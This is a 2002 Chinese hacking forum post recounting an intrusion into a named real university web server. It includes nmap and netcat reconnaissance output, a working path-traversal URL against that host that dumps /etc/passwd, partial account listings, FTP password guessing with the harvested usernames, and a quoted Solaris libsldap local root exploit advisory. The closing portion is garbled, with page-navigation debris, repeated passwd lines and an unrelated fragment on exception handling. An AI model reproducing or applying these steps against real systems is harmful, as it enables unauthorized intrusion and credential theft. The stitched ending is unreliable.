实验六:与其它漏洞结合,修改系统设置,查看系统文件,执行系统命令等
由于与浏览器相关的漏洞太多了,所以可与跨站脚本执行漏洞一起结合的漏洞也就显得不少。我想这些问题大家都应该很清楚吧,前些时间的修改IE标题漏洞,错误MIME类型执行命令漏洞,还有多种多样的蠕虫,都是很好的例子。
更多的例子请参考下列链接: Internet Explorer Pop-Up OBJECT Tag Bug
http://archives.neohapsis.com/archives/bugtraq/2002-01/0167.html
Internet Explorer Javascript Modeless Popup Local Denial of
Service Vulnerability
http://archives.neohapsis.com/archives/bugtraq/2002-01/0058.html
MSIE6 can read local files
http://www.xs4all.nl/~jkuperus/bug.htm MSIE may download and
run progams automatically
http://archives.neohapsis.com/archives/bugtraq/2001-12/0143.html
File extensions spoofable in MSIE download dialog
http://archives.neohapsis.com/archives/bugtraq/2001-11/0203.html
the other IE cookie stealing bug (MS01-055)
http://archives.neohapsis.com/archives/bugtraq/2001-11/0106.html
Microsoft Security Bulletin MS01-055
http://archives.neohapsis.com/archives/bugtraq/2001-11/0048.html
Serious security Flaw in Microsoft Internet Explorer - Zone
Spoofing
http://archives.neohapsis.com/archives/bugtraq/2001-10/0075.html
Incorrect MIME Header Can Cause IE to Execute E-mail Attachment
http://www.kriptopolis.com/cua/eml.html
本来这文章也懒得写了,不过前阵子用这种思路K了好些网站之后,无痕大哥要我写出来,再加上傲气雄鹰这个居心不良的家伙喊我去做他
</P><P>那里的入侵实例版的斑竹,我就只好利用今天下雨,来啃篇文章了,错误之处还请大家指正。
</P><P>
在我攻克的几家网站中,www.uta.edu是安全措施做的最好的,其他的也没什么困难,也不过是些过滤之类的麻烦。那么,我就把我攻克
</P><P>uta.edu的过程写出来好了. </P><P> 首先,我们ping一下
C:\>ping www.uta.edu </P><P>Pinging
sun250.uta.edu [129.107.56.154] with 32 bytes of data:
</P><P>Request timed out. Request timed out.
Request timed out. Request timed out.
</P><P>Ping statistics for 129.107.56.154: Packets:
Sent = 4, Received = 0, Lost = 4 (100% loss), Approximate round
trip times in milli-seconds: Minimum = 0ms, Maximum = 0ms,
Average = 0ms </P><P>C:\> </P><P>
faint,看来装了防火墙或做了icmp过滤之类~~~@_@ 没关系,我们至少得到了ip.
我们再来,能够看到他的页面,说明80可能开了 那么,我们请出瑞士军刀netcat,嘻嘻,我最喜欢了.
C:\>nc -vv 129.107.56.154 80 sun250.uta.edu
[129.107.56.154] 80 (http) open GET / HTTP/1.1
</P><P>HTTP/1.1 400 Bad Request Date: Tue, 14 May
2002 07:03:02 GMT Server: Apache Connection: close
Transfer-Encoding: chunked Content-Type: text/html;
charset=iso-8859-1 </P><P>127 <!DOCTYPE HTML
PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD>
<TITLE>400 Bad Request</TITLE>
</HEAD><BODY> <H1>Bad Request</H1>
Your browser sent a request that this server could not
understand.<P> client sent HTTP/1.1 request without
hostname (see RFC2616 section 14.23): /<P>
</BODY></HTML> </P><P>0
</P><P>sent 16, rcvd 480: NOTSOCK
</P><P>C:\> </P><P>
呵呵,又搞到不少有用信息.我来解释一下,在这里,我用get / http/1.1来取得他的webserver的相关信息 那么我们得到了什么呢?只知道了是apache~~~~faint,连版本都没搞到~~~@_@我愤怒了,于是请出扫描器之王namp~~~@_@
</P><P>嘻嘻,我个人认为nmap比shadow security
scanner管用多了!!哈哈,特别是在版本的判断上
好,我们来扫.这里我用的是nt下的版本,在www.patching.net/abu有下载~~~@_@不过要先装winpcap---一个非常好的东西
</P><P>C:\>nmap -sS -O -vv 129.107.56.154
</P><P>Starting nmap V. 2.54BETA32 (
www.insecure.org/nmap ) </P><P>Host sun250.uta.edu
(129.107.56.154) appears to be up ... good. Initiating SYN
Stealth Scan against sun250.uta.edu (129.107.56.154) Adding open
port 443/tcp Adding open port 514/tcp Adding open port
111/tcp Adding open port 21/tcp Adding open port 587/tcp
Adding open port 23/tcp Adding open port 6000/tcp Adding
open port 80/tcp Adding open port 22/tcp Adding open port
32772/tcp Adding open port 32771/tcp Adding open port
3306/tcp </P><P>The SYN Stealth Scan took 33 seconds to
scan 1554 ports. </P><P>For OSScan assuming that port 21
is open and port 1 is closed and neither are firewalled
Interesting ports on sun250.uta.edu (129.107.56.154): (The
1532 ports scanned but not shown below are in state: closed)
Port State Service 21/tcp open ftp 22/tcp open ssh
23/tcp open telnet 25/tcp filtered smtp 53/tcp filtered
domain 80/tcp open http 111/tcp open sunrpc 137/tcp
filtered netbios-ns 138/tcp filtered netbios-dgm 139/tcp
filtered netbios-ssn 161/tcp filtered snmp 162/tcp filtered
snmptrap 443/tcp open https 445/tcp filtered microsoft-ds
514/tcp open shell 587/tcp open submission 3306/tcp open
mysql 6000/tcp open X11 6346/tcp filtered gnutella
6699/tcp filtered napster 32771/tcp open sometimes-rpc5
32772/tcp open sometimes-rpc7 </P><P>Remote
operating system guess: Sun Solaris 8 early acces beta through
actual release OS Fingerprint:
TSeq(Class=TR%IPID=I%TS=100HZ)
T1(Resp=Y%DF=Y%W=60DA%ACK=S++%Flags=AS%Ops=NNTNWM)
T2(Resp=N) T3(Resp=N)
T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=Y%W=0%ACK=S%Flags=AR%Ops=) PU(Resp=N)
</P><P>Uptime 7.325 days (since Tue May 07 07:03:54
2002) TCP Sequence Prediction: Class=truly random
Difficulty=9999999 (Good luck!) TCP ISN Seq. Numbers:
3F1DE88F 900E621B 22316BB6 E50C108F D6DE4B4B 7089B80B IPID
Sequence Generation: Incremental </P><P>Nmap run
completed -- 1 IP address (1 host up) scanned in 50 seconds
</P><P>C:\> </P><P>我来解释一下-sS
是选择用syn扫描,嘻嘻,原理不多说-O是判断主机类型,大家都知道nmap的利用tcp/ip堆栈判断系统类型很厉害.-vv是为了
</P><P>看到详细过程!
</P><P>faint,这么多被filter的端口~~~@_@我KAO,连25的smtp和161的snmp都给filter了,这里32771和32772等是随机端口,说明有人在远程使用这个机
</P><P>子~~~~@_@,看来今天要小心,上面有人!!不过还是有几个让我兴奋的端口,比如21,22,23,111,80,514,3306等.
</P><P>好,我们再来看主机类型@_@faint,居然是Sun Solaris 8 early acces
beta through actual release还好不是最新版,还有点办法~~~@_@不过
</P><P>sunos5.8的大bug好象不多,管他的,先事事snmpdmid的那个古老的远程溢出~~~@_@结果failed,果然不出所料,这种大型网站一般比较坚挺~~~@_@
恩,试了几个rpc都不行~~~@_@
</P><P>好了,第一轮探测结束,现在开始第二轮,再用nc,看下各个服务的banner再说~~~
</P><P>以下是nc的结果 </P><P>220 sun250 FTP server
(Version wu-2.6.2(1) Tue May 7 09:50:51 CDT 2002) ready.
</P><P>KAO,把我吓着了~~~@_@wuftp2.6.2,看来即使有帐号这条路也走不通了
</P><P>SSH-2.0-OpenSSH_3.1p1
</P><P>倒~~~@_@真是神仙~~~~这么高的版本,看来ssh这条路也难走~~~
</P><P>telnet
23一下看,只看到是sunos5.8随便试了几个帐号比如test都没成功,这样不是办法啊~~~@_@
</P><P>啊,还有个3306的mysql比较好看~~用客户端连连看,结果要密码~~~faint
</P><P>难道真的没有办法了吗~~~???我实在是不愿意走cgi这条路~~~@_@,唉,没办法,我们来吧~~~
</P><P>于是我拿出了sss(我们的shadow)先扫扫~~~@_@再看,由于我一直找不到好的cgi扫描器,所以目前一般用sss扫cgi,伤脑筋,谁有好的记得告诉我
</P><P></P><P>让他慢慢扫了,我先去和x-laser打桌球去~~~@_@呵呵,x-laser今天去会考,祝他好运!唉,sss就是让我等的心急~~~~听歌去,现在日本新出个歌手
</P><P>叫鬼束千寻 ,歌很不错啊~~~推荐大家听听.....
</P><P>sss扫好了,放眼望去,结果一般,不过有一个cgi漏洞~~~-------cal_make.pl,tmd,今天前面扯了这么久终于进入正题了!去hack.co.za的镜像翻
</P><P>了翻,发现这个属于showfile类型,也就是说可以读取文件!!哈哈,描述如下
</P><P> Name : PerlCal About : cal_make.pl of
the PerlCal script may allow remote users(website visitors) to view
any file on a webserver </P><P>(dependingon the user the
webserver is running on). </P><P>Exploit:
</P><P>http://www.VULNERABLE.com/cgi-bin/cal_make.pl?\
p0=../../../../../../../../../../../../etc/passwd%00 by:
stan (stan@whizkunde.org)
</P><P>这应该是一个计数器程序的漏洞,嘿嘿,看来uta.edu百密必有一疏,cgi和udp一般是不被人重视的.我们现在试试这个漏洞看~~~@_@
</P><P>在浏览器输入 </P><P>
http://www.uta.edu/cgi-bin/perlcal/cal_make.pl?p0=../../../../../../../../../../../../../etc/passwd%00
</P><P> YAHOOOOOOOOOOOOOOOOOOOOO~~~~~~我们成功了,we got
it~~~哈哈哈哈哈哈,爽,看到大量帐号,我有预感今天要发财. </P><P>显示如下
</P><P>root:x:0:1uper-User:/:/sbin/sh
acctmgr:x:0:3040UID Account
Manager:/home/acs/acctmgr:/usr/bin/tcsh daemon:x:1:1::/:
</P><P>bin:x:2:2::/usr/bin: sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer
Admin:/usr/spool/lp: uucp:x:5:5:uucp
</P><P>Admin:/usr/lib/uucp: nuucp:x:9:9:uucp
Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network </P><P>Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access
User:/: nobody4:x:65534:65534unOS 4.x
</P><P>Nobody:/: bbuser:x:200:3040:Big Brother User
Account:/home/acs/bbuser:/usr/bin/tcsh lynx:x:201:50:Apache
</P><P>User:/:/usr/local/bin/false
mysql:x:29840:1::/home/mysql:/bin/sh jth:x:12715:10:JASON T
</P><P>.......
</P><P></P><P>下面还有好多,限于篇幅就不写了~~~@_@不过,这是一个shadow过了passwd,怎么办?很多人到这里就放弃,不过如果我放弃了就做不了幻影旅团团
</P><P>长了~~~~得到用户名的第一反应应该是高兴,特别是得到了大量的用户名的时候!因为意味着可能存在弱口令!
</P><P>所以现在我们的思路就是分离出username然后做成字典,就可以跑了!这个时候,前面的ftp服务就显出其重要的地位了!!!
</P><P>好了,说的轻松,要分离出用户名不是那么简单的!首先是这个的格式问题!浏览器里面的格式和passwd的标准格式存在出入
</P><P>如果是标准格式,我们可以直接在linux下这样分离
</P><P>假设pp是一个passwd文件 </P><P>那么我
</P><P>$cut -d: -f 1 pp > tt
</P><P>通过这一句命令就实现了以上功能。写入了文件tt </P><P>-d是把
“:”作为分隔符 ,-f是指取第一个字段 </P><P>这样就就可以很方便的把users提出来
</P><P> syshunter提供的一种方法是使用awk
</P><P>cat passwd│awk '{if ($NF=="bash") print $NF}'
</P><P>
而这些的效果都不是很好,这个时候我的副团长atomic马上根据需要写了个小程序,用以分离username,非常好用
</P><P>Atomic说: </P><P>回复yshunter,atmoic我找到一种更简单的提炼用户名的方法
</P><P>我的程序是多行/单行通吃的哦 </P><P>无论你是所有文件集中在一行
(?../../../etc/passwd得到的) 还是!cat下来的都可以:) </P><P>
哈哈,他的的确好用,而且是windows下的图形界面 同时有找出空口令的功能
</P><P>可以在http://apower.uhome.net/getusers.exe下载~~~@_@
</P><P>顺便提一句,以前coolfire的那个分离用户名的没作用@_@
</P><P>于是,我得到了几百个用户名!!!!马上挂上流光,跑ftp
</P><P>晕~~~@_@开始一遍什么都没扫到~~@_@ </P><P>
KAO,我不信!几百个user会没有弱口令?不对,于是我放低线程
</P><P>休息片克~~~终于有收获了~~~不过只有3个~~~
</P><P>我迫不及待的telnet上去,倒~~~@_@进不去,不会吧~~~~~再回过头看下passwd文件,倒~~~这个居然是没shell的faint
</P><P>换~~~终于看到一个tt的帐号有shell </P><P>
呵呵,好事多磨~~~,现在telnet上去喽~~!!!!!!
</P><P>于是我得到了一个shell,我赶紧去找网页目录,find / -name "index.htm"
-print </P><P>倒~~~找了很多,不过没一个是,看来是权限不够~~!!
</P><P>我咬咬牙,决定得到他的root,先find一遍没有发现可用的 suid shell
</P><P>恩,看来安全设置不错,幸好还允许我生成core文件,所以我准备来本地溢出.
</P><P>在安焦上找了个代码,嘿嘿,在国内我成功过的,现在来看看.下面是我在safechina发的帖子,关于sunos5.8的本地溢出
</P><P>-----------------------------------------------------------------------------------------------------------------------------
记得以前cooldidi兄问我关于在sunos5.8下提升权限问题
</P><P>当时没什么需要,也没去注意,现在要用了,就找了下:)
</P><P>首先solaris的gcc 一般在/usr/local/bin/gcc
</P><P>所以可以在gcc上编译,代码在安焦有
</P><P>====================================================
From: Noir Desir <noir@gsu.linux.org.tr> To:
bugtraq@securityfocus.com <bugtraq@securityfocus.com>
Subject: Solaris 8 libsldap exploit Date: 2001-7-5 14:14:00
====================================================
Hi, </P><P>I wish to free this one since it
has been made public by some ppl. libsldap hole has been
known for long. As far as I know, sway@hack.co.za did actually
found the hole several months ago and generously let me know
about it. All propz goes to him. Thanks bro.
</P><P>Exploit is plain simple, tested on an Ultra10 and
an Enterprise 3500 with success. I usually support the
anti-sec movement but I got my reasons to publish the exploit.
If you want to know why, please do mail me. </P><P>$
./libsldap-exp libsldap.so.1 $LDAP_OPTIONS enviroment variable
buffer overflow Exploit code: noir@gsu.linux.org.tr Bug
discovery: sway@hack.co.za </P><P>Usage: ./libsldap-exp
target# </P><P>target#: 0, /usr/bin/passwd Solaris8,
Sparc64 target#: 1, /usr/bin/nispasswd Solaris8, Sparc64
target#: 2, /usr/bin/yppasswd Solaris8, Sparc64 target#: 3,
/usr/bin/chkey Solaris8, Sparc64 target#: 4, /usr/lib/sendmail
Solaris8, Sparc64 $ ./libsldap-exp 0 # id uid=0(root)
gid=0(root) # </P><P> PS: t(L)amer sahin kicina
oyle bir tekme yiyeceksinki, agzindan cikicak. Haberin olsun
istedim : ) </P><P> Greetings: sway, anathema,
gov-boi, www.hack.co.za, ertan_kurt, cronos </P><P>
cheers, noir
</P><P></P><P></P><P>/**
!!!PRIVATE!!! ** noir@gsu.linux.org.tr ** libsldap.so.1
$LDAP_OPTIONS enviroment variable overflow exploit; ** **/
首页 
小榕软件实验室 
刀光雪影 
跨站脚本执行漏洞详解,最流行lb5K也有此漏?.. 
将此页发给您的朋友
查看
邮件
主页
QQ
消息
引用
复制
下载
编辑
删除
发表于 2002-06-10.00:00:06 
IP: 
HTTP/1.1\r\n". 
uper-User:/:/sbin/sh
acctmgr:x:0:3040
UID Account
Manager:/home/acs/acctmgr:/usr/bin/tcsh daemon:x:1:1::/:
</P><P>bin:x:2:2::/usr/bin: sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer
Admin:/usr/spool/lp: uucp:x:5:5:uucp
</P><P>Admin:/usr/lib/uucp: nuucp:x:9:9:uucp
Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network </P><P>Admin:/usr/net/nls:
nobody:x:60001:60001:Nobody:/: noaccess:x:60002:60002:No Access
User:/: nobody4:x:65534:65534
0])中所包含的地址,这个地址指向的地方存放着上一层异常链指针,而在这个地址+4的地方存放着最低层异常处理指针,操作系统就自动跳到这个指针所指向的函数去执行来进行异常处理。当这个函数无法对异常进行处理的时候,再根据上一层的异常链指针来寻找到上一层的异常处理指针来处理,如果所有的异常处理函数都无法处理这个异常,那么系统就使用默认异常处理指针(即顶层异常处理指针)来处理异常情况,就是这个函数:
